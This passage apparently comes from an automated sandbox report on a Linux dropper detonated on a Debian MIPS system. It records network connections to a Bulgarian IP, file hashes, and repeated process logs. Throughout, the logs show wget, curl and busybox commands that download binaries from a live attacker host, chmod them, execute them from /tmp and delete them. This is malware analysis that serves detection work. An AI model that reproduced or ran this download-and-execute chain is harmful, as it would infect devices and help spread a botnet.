[curl -O http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]
/bin/chmod
[chmod 777 HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]
/tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj
[./HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]
/bin/rm
[rm HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]
/usr/bin/wget
[wget http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]
/bin/chmod
[chmod 777 aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]
/tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM
[./aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]
/bin/rm
[rm aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]
/usr/bin/wget
[wget http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]
Network
| Country | Destination | Domain | Proto |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
Files
/tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
memory/749-1-0xb6777000-0xb6788044-memory.dmp
memory/839-2-0xb672b000-0xb673c044-memory.dmp
memory/857-3-0xb6705000-0xb6716044-memory.dmp
memory/869-4-0xb6710000-0xb6721044-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-10-25 01:27
Reported
2024-10-25 01:30
Platform
debian9-mipsbe-20240729-en
Max time kernel
62s
Max time network
63s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO | /tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO | N/A |
| N/A | /tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy | /tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy | N/A |
| N/A | /tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt | /tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt | N/A |
| N/A | /tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM | /tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM | N/A |
| N/A | /tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2 | /tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2 | N/A |
| N/A | /tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn | /tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn | N/A |
| N/A | /tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK | /tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK | N/A |
| N/A | /tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq | /tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq | N/A |
| N/A | /tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2 | /tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2 | N/A |
| N/A | /tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI | /tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI | N/A |
| N/A | /tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw | /tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw | N/A |
| N/A | /tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4 | /tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4 | N/A |
| N/A | /tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj | /tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj | N/A |
| N/A | /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz | /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz | N/A |
| N/A | /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz | /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz | N/A |
| N/A | /tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj | /tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj | N/A |
| N/A | /tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM | /tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM | N/A |
| N/A | /tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2 | /tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2 | N/A |
| N/A | /tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn | /tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn | N/A |
| N/A | /tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO | /tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO | N/A |
| N/A | /tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy | /tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy | N/A |
| N/A | /tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt | /tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt | N/A |
| N/A | /tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq | /tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq | N/A |
| N/A | /tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK | /tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK | N/A |
| N/A | /tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4 | /tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4 | N/A |
| N/A | /tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2 | /tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2 | N/A |
| N/A | /tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI | /tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI | N/A |
| N/A | /tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw | /tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/rm | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK | /usr/bin/curl | N/A |
| File opened for modification | /tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK | /usr/bin/curl | N/A |
| File opened for modification | /tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz | /usr/bin/curl | N/A |
| File opened for modification | /tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI | /usr/bin/curl | N/A |
| File opened for modification | /tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt | /usr/bin/curl | N/A |
| File opened for modification | /tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn | /usr/bin/curl | N/A |
| File opened for modification | /tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO | /usr/bin/curl | N/A |
Processes
/tmp/402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh
[/tmp/402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]
/bin/chmod
[chmod 777 DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]
/tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO
[./DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]
/bin/rm
[rm DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]
/usr/bin/wget
[wget http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]
/bin/chmod
[chmod 777 jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]
/tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy
[./jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]
/bin/rm
[rm jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]
/usr/bin/wget
[wget http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]
/bin/chmod
[chmod 777 Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]
/tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt
[./Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]
/bin/rm
[rm Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]
/usr/bin/wget
[wget http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]
/bin/chmod
[chmod 777 aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]
/tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM
[./aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]
/bin/rm
[rm aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]
/usr/bin/wget
[wget http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]
/bin/chmod
[chmod 777 Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]
/tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2
[./Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]
/bin/rm
[rm Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]
/usr/bin/wget
[wget http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]
/bin/chmod
[chmod 777 KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]
/tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn
[./KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]
/bin/rm
[rm KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]
/usr/bin/wget
[wget http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]
/bin/chmod
[chmod 777 5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]
/tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK
[./5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]
/bin/rm
[rm 5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]
/usr/bin/wget
[wget http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]
/bin/chmod
[chmod 777 Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]
/tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq
[./Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]
/bin/rm
[rm Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]
/usr/bin/wget
[wget http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]
/bin/chmod
[chmod 777 BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]
/tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2
[./BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]
/bin/rm
[rm BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]
/usr/bin/wget
[wget http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]
/bin/chmod
[chmod 777 3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]
/tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI
[./3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]
/bin/rm
[rm 3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]
/usr/bin/wget
[wget http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]
/bin/chmod
[chmod 777 F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]
/tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw
[./F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]
/bin/rm
[rm F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]
/usr/bin/wget
[wget http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]
/bin/chmod
[chmod 777 RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]
/tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4
[./RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]
/bin/rm
[rm RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]
/usr/bin/wget
[wget http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]
/bin/chmod
[chmod 777 HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]
/tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj
[./HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]
/bin/rm
[rm HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]
/usr/bin/wget
[wget http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]
/bin/chmod
[chmod 777 hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]
/tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz
[./hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]
/bin/rm
[rm hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]
/usr/bin/wget
[wget http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]
/bin/chmod
[chmod 777 hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]
/tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz
[./hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]
/bin/rm
[rm hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]
/usr/bin/wget
[wget http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]
/bin/chmod
[chmod 777 HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]
